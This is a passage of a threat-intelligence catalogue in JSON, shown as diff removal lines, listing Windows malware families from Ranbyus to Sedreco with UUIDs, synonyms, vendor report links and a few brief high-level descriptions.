"uuid": "5d9a27e7-3110-470a-ac0d-2bf00cac7846", - "value": "Ranbyus", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranscam", - "http://blog.talosintel.com/2016/07/ranscam.html" - ] - }, - "uuid": "50c92b0b-cae3-41e7-b7d8-dffc2c88ac4b", - "value": "Ranscam", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransoc", - "https://www.proofpoint.com/us/threat-insight/post/ransoc-desktop-locking-ransomware-ransacks-local-files-social-media-profiles" - ] - }, - "uuid": "5310903e-0704-4ca4-ab1b-52d243dddb06", - "value": "Ransoc", - "description": "" - }, - { - "meta": { - "synonyms": [ - "WinLock" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomlock", - "https://www.symantec.com/security_response/writeup.jsp?docid=2012-022215-2340-99&tabid=2", - "https://forum.malekal.com/viewtopic.php?t=36485&start=" - ] - }, - "uuid": "3e47c926-eea3-4fba-915a-1f3c5b92a94c", - "value": "Ransomlock", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom", - "https://twitter.com/malwrhunterteam/status/977275481765613569", - "https://twitter.com/malwrhunterteam/status/997748495888076800" - ] - }, - "uuid": "06929ad3-2a00-4212-b171-9ecb5f956af5", - "value": "Rapid Ransom", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_stealer", - "http://pwc.blogs.com/cyber_security_updates/2014/09/malware-microevolution.html" - ] - }, - "uuid": "bc1fc21d-80c0-4629-bb18-d5ae1df2a431", - "value": "RapidStealer", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar", - "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" - ] - }, - "uuid": "e0a1407f-2595-4bd2-ba16-2c6d9be4e066", - "value": "rarstar", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratabankapos", - "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", - "http://blog.trex.re.kr/3" - ] - }, - "uuid": "15b85bac-c58b-41fd-8332-cfac7c445e0d", - "value": "RatabankaPOS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos", - "https://threatvector.cylance.com/en_us/home/rawpos-malware.html", - "http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite" - ] - }, - "uuid": "80f87001-ff40-4e33-bd12-12ed1a92d1d7", - "value": "RawPOS", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Remote Control System", - "Crisis" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs", - "https://www.f-secure.com/documents/996508/1030745/callisto-group", - "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/" - ] - }, - "uuid": "c359c74e-4155-4e66-a344-b56947f75119", - "value": "RCS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rdasrv", - "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf" - ] - }, - "uuid": "1bf3469a-b9c8-497a-bcbb-b1095386706a", - "value": "rdasrv", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot", - "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html", - "http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html", - "http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/", - "https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under" - ] - }, - "uuid": "9d58d94f-6885-4a38-b086-b9978ac62c1f", - "value": "ReactorBot", - "description": "Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver", - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/" - ] - }, - "uuid": "826c31ca-2617-47e4-b236-205da3881182", - "value": "Reaver", - "description": "Reaver is a type of malware discovered by researchers at Palo Alto Networks in November 2017, but its activity dates back to at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants, noted as versions 1, 2, and 3. The malware is unique as its final payload masquerades as a control panel link (CPL) file. The intended targets of this activity are unknown as of this writing; however, it was used concurrently with the SunOrcal malware and the same C2 infrastructure used by threat actors who primarily target based on the \"Five Poisons\" - five perceived threats deemed dangerous to, and working against the interests of, the Chinese government." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.redalpha", - "https://www.recordedfuture.com/redalpha-cyber-campaigns/" - ] - }, - "uuid": "6be9eee4-ee99-4ad6-bee3-2365d7b37a88", - "value": "RedAlpha", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves", - "http://blog.macnica.net/blog/2017/12/post-8c22.html", - "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", - "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves", - "https://www.jpcert.or.jp/magazine/acreport-redleaves.html" - ] - }, - "uuid": "a70e93a7-3578-47e1-9926-0818979ed866", - "value": "RedLeaves", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_alert", - "https://twitter.com/JaromirHorejsi/status/816237293073797121" - ] - }, - "uuid": "cd5f5165-7bd3-4430-b0bc-2c8fa518f618", - "value": "Red Alert", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_gambler", - "http://image.ahnlab.com/file_upload/asecissue_files/ASEC%20REPORT_vol.91.pdf" - ] - }, - "uuid": "ca8ed7c0-f40b-4c0e-9dc4-52d6e0da41a7", - "value": "Red Gambler", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.regeorg", - "https://sensepost.com/discover/tools/reGeorg/", - "https://github.com/sensepost/reGeorg" - ] - }, - "uuid": "9ee0eb87-7648-4581-b301-7472a48946ad", - "value": "reGeorg", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.regin", - "https://www.youtube.com/watch?v=jeLd-gw2bWo" - ] - }, - "uuid": "4cbe9373-6b5e-42d0-9750-e0b7fc0d58bb", - "value": "Regin", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos", - "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html", - "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", - "http://malware-traffic-analysis.net/2017/12/22/index.html", - "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2", - "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/", - "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/", - "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/", - "https://secrary.com/ReversingMalware/RemcosRAT/" - ] - }, - "uuid": "2894aee2-e0ec-417a-811e-74a68ab967b2", - "value": "Remcos", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf", - "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions" - ] - }, - "uuid": "d39486af-c056-4bbf-aa1d-86fb5ef90ada", - "value": "Remexi", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf" - ] - }, - "uuid": "6a3c3fbc-97ec-4938-b64e-2679e4b73db9", - "value": "Remsec", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy" - ] - }, - "uuid": "b2b93651-cf64-47f5-a54f-799b919c592c", - "value": "Remy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rerdom", - "https://www.coresecurity.com/sites/default/files/resources/2017/03/Behind_Malware_Infection_Chain.pdf" - ] - }, - "uuid": "a1f137d4-298f-4761-935d-bd39ab898479", - "value": "Rerdom", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.retadup", - "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/" - ] - }, - "uuid": "42fa55e3-e708-4c11-b807-f31573639941", - "value": "Retadup", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Tsukuba", - "Werdlod" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe", - "https://www.govcert.admin.ch/blog/33/the-retefe-saga", - "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/", - "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/", - "https://github.com/cocaman/retefe" - ] - }, - "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777", - "value": "Retefe", - "description": "Retefe is a Windows Banking Trojan that can also download and install additional malware onto the system using Windows PowerShell. It's primary functionality is to assist the attacker with stealing credentials for online banking websites. It is typically targeted against Swiss banks. The malware binary itself is primarily a dropper component for a Javascript file which builds a VBA file which in turn loads multiple tools onto the host including: 7zip and TOR. The VBA installs a new root certificate and then forwards all traffic via TOR to the attacker controlled host in order to effectively MITM TLS traffic." - }, - { - "meta": { - "synonyms": [ - "Revetrat" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.revenge_rat", - "http://blog.deniable.org/blog/2016/08/26/lurking-around-revenge-rat/", - "https://isc.sans.edu/diary/rss/22590", - "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" - ] - }, - "uuid": "75b1e86f-fcc1-49a7-9b4e-7cd93e91b23f", - "value": "Revenge RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/", - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/" - ] - }, - "uuid": "daddd1dc-c415-4970-89ee-526ee8de2ec1", - "value": "RGDoor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rikamanu", - "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" - ] - }, - "uuid": "6703e8ce-2c5e-4a9d-96b4-49e90074b043", - "value": "Rikamanu", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rincux" - ] - }, - "uuid": "383021b9-fcf9-4c21-a0e2-d75fb8c0727a", - "value": "Rincux", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ripper_atm", - "http://blog.trendmicro.com/trendlabs-security-intelligence/untangling-ripper-atm-malware/" - ] - }, - "uuid": "a85b0619-ed8e-4324-8603-af211d682dac", - "value": "Ripper ATM", - "description": "" - }, - { - "meta": { - "synonyms": [ - "yellowalbatross" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rock", - "https://github.com/securitykitten/malware_references/blob/master/rmshixdAPT-C-15-20160630.pdf" - ] - }, - "uuid": "95a26977-295f-4843-ad11-a3d9dcb6c192", - "value": "rock", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader", - "https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware" - ] - }, - "uuid": "1482ffff-47a8-46da-8f47-d363c9d86c0e", - "value": "Rockloader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rofin" - ] - }, - "uuid": "bd7b1628-2aeb-44c5-91e7-f02c011034cf", - "value": "Rofin", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku" - ] - }, - "uuid": "38f57823-ccc2-424b-8140-8ba30325af9c", - "value": "Rokku", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat", - "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html", - "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf", - "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html", - "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", - "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/", - "https://www.youtube.com/watch?v=uoBQE5s2ba4" - ] - }, - "uuid": "16dcc67b-4415-4620-818d-7ca24a5ccaf5", - "value": "RokRAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "CarbonGrabber" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rombertik", - "http://blogs.cisco.com/security/talos/rombertik" - ] - }, - "uuid": "ab5066b4-d5ff-4f83-9a05-6e74c043a6e1", - "value": "Rombertik", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.romeos" - ] - }, - "uuid": "87a45a07-30d7-4223-ae61-6b1e6dde0f5a", - "value": "Romeo(Alfa,Bravo, ...)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopirs" - ] - }, - "uuid": "b4a3d0ef-2d7b-4da5-8f90-8213f8f318d9", - "value": "Roopirs", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.roseam", - "http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/" - ] - }, - "uuid": "8a4eb0ca-7175-4e69-b8d2-fd7a724de67b", - "value": "Roseam", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rover", - "http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/" - ] - }, - "uuid": "53e94bc9-c8d2-4fb6-9c02-00841e454050", - "value": "Rover", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Mayachok", - "Cidox", - "BkLoader" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rovnix", - "https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=981", - "https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0", - "https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/", - "https://blogs.technet.microsoft.com/mmpc/2013/07/25/the-evolution-of-rovnix-private-tcpip-stacks/", - "https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/", - "http://www.malwaretech.com/2014/05/rovnix-new-evolution.html", - "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf", - "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html" - ] - }, - "uuid": "8d984309-b7fa-4ccf-a6b7-da17283aae2f", - "value": "Rovnix", - "description": "Rovnix is a bootkit and consists of a driver loader (in the VBR) and the drivers (32bit, 64bit) themselves. It is part of the Carberp source code leak (https://github.com/nyx0/Rovnix). Rovnix has been used to protect Gozi ISFB, ReactorBot and Rerdom (at least)." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", - "https://github.com/nccgroup/Royal_APT" - ] - }, - "uuid": "92d87656-5e5b-410c-bdb6-bf028324dc72", - "value": "RoyalCli", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", - "https://github.com/nccgroup/Royal_APT" - ] - }, - "uuid": "8611f656-b0d8-4d16-93f0-c699f2af9b7a", - "value": "Royal DNS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rozena", - "https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena" - ] - }, - "uuid": "cf74b7a5-72c0-4c2a-96c1-b3c49fc8f766", - "value": "Rozena", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm", - "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf" - ] - }, - "uuid": "e6952b4d-e96d-4641-a88f-60074776d553", - "value": "RTM", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtpos", - "https://boozallenmts.com/resources/news/rtpos-new-point-sale-malware-family-uncovered" - ] - }, - "uuid": "89ee2cb0-2c72-4a25-825b-bb56083fdd9b", - "value": "rtpos", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ruckguv", - "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear" - ] - }, - "uuid": "b88b50c0-3db9-4b8f-8564-4f56f991bee2", - "value": "Ruckguv", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rumish" - ] - }, - "uuid": "e1564cfe-ab82-4c14-8f92-65af0d760d70", - "value": "Rumish", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat", - "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" - ] - }, - "uuid": "b746a645-5974-44db-a811-a024214b7fba", - "value": "running_rat", - "description": "" - }, - { - "meta": { - "synonyms": [ - "RCSU" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rurktar", - "https://www.gdatasoftware.com/blog/2017/07/29896-rurktar-spyware-under-construction" - ] - }, - "uuid": "512e0b13-a52b-45ef-9230-7172f5e976d4", - "value": "Rurktar", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock", - "https://www.secureworks.com/blog/research-21041", - "http://contagiodump.blogspot.com/2011/10/rustock-samples-and-analysis-links.html", - "https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html", - "http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html", - "http://blog.novirusthanks.org/2008/11/i-wormnuwarw-rustocke-variant-analysis/", - "http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf", - "http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSArticales_PRDrWEB_RustockC_eng.pdf", - "https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/" - ] - }, - "uuid": "76e98e04-0ab7-4000-80ee-7bcbcf9c110d", - "value": "Rustock", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Saga" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom", - "https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/", - "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga", - "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/", - "http://malware-traffic-analysis.net/2017/10/13/index.html" - ] - }, - "uuid": "56db8a46-a71b-4de1-a6b8-4312f78b8431", - "value": "SAGE", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Sakurel" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1", - "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula", - "https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99", - "https://www.secureworks.com/research/sakula-malware-family" - ] - }, - "uuid": "e88eb9b1-dc8b-4696-8dcf-0c29924d0f8b", - "value": "Sakula RAT", - "description": "Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files onto the compromised computer." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.salgorea", - "https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf" - ] - }, - "uuid": "060ff141-bb68-47ca-8a9d-8722f1edaa6e", - "value": "Salgorea", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality", - "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf" - ] - }, - "uuid": "cf752563-ad8a-4286-b2b3-9acf24a0a09a", - "value": "Sality", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam", - "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx", - "https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/", - "http://blog.talosintel.com/2016/03/samsam-ransomware.html", - "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html", - "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/" - ] - }, - "uuid": "696d78cb-1716-4ca0-b678-c03c7cfec19a", - "value": "SamSam", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Daws" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sanny", - "http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html" - ] - }, - "uuid": "34c6504b-e947-49d8-a963-62b7594b7ef9", - "value": "Sanny", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Hussarini" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust", - "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a", - "https://www.fortinet.com/blog/threat-research/hussarini---targeted-cyber-attack-in-the-philippines.html" - ] - }, - "uuid": "5aed5403-9c52-4de6-9c8d-d29e5197ef7e", - "value": "Sarhust", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan", - "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread", - "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/", - "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html" - ] - }, - "uuid": "5639f7db-ab70-4b86-8a2f-9c4e3927ba91", - "value": "Satan Ransomware", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.satana", - "https://www.cylance.com/threat-spotlight-satan-raas" - ] - }, - "uuid": "09b555be-8bac-44b2-8741-922ee0b87880", - "value": "Satana", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot", - "https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/" - ] - }, - "uuid": "bdc7cc9c-c46d-4f77-b903-2335cc1a3369", - "value": "Sathurbot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos", - "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", - "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos" - ] - }, - "uuid": "e3adbb0d-6d6e-4686-8108-ee76452339bf", - "value": "ScanPOS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.schneiken", - "https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb", - "https://github.com/vithakur/schneiken" - ] - }, - "uuid": "92a65c89-acc3-4ee7-8db0-f0ea293ed12d", - "value": "Schneiken", - "description": "Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). Entire code is Base64 encoded." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.scote", - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/" - ] - }, - "uuid": "8c764bd6-2c6e-4cb2-93e3-f805cd99fe1e", - "value": "Scote", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.screenlocker", - "https://twitter.com/struppigel/status/791535679905927168" - ] - }, - "uuid": "9803b201-28e5-40c5-b661-c1a191388072", - "value": "ScreenLocker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.seadaddy", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" - ] - }, - "uuid": "1d07212e-6292-40a4-a5e9-30aef83b6207", - "value": "SeaDaddy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.seasalt", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "d66f466a-e70e-4b62-9a04-d62eb41da15c", - "value": "SeaSalt", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedll", - "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", - "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" - ] - }, - "uuid": "272268bb-2715-476b-a121-49142581c559", - "value": "SeDll", - "description": "" - }, - { - "meta": { - "synonyms": [ - "azzy", - "eviltoss" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", - 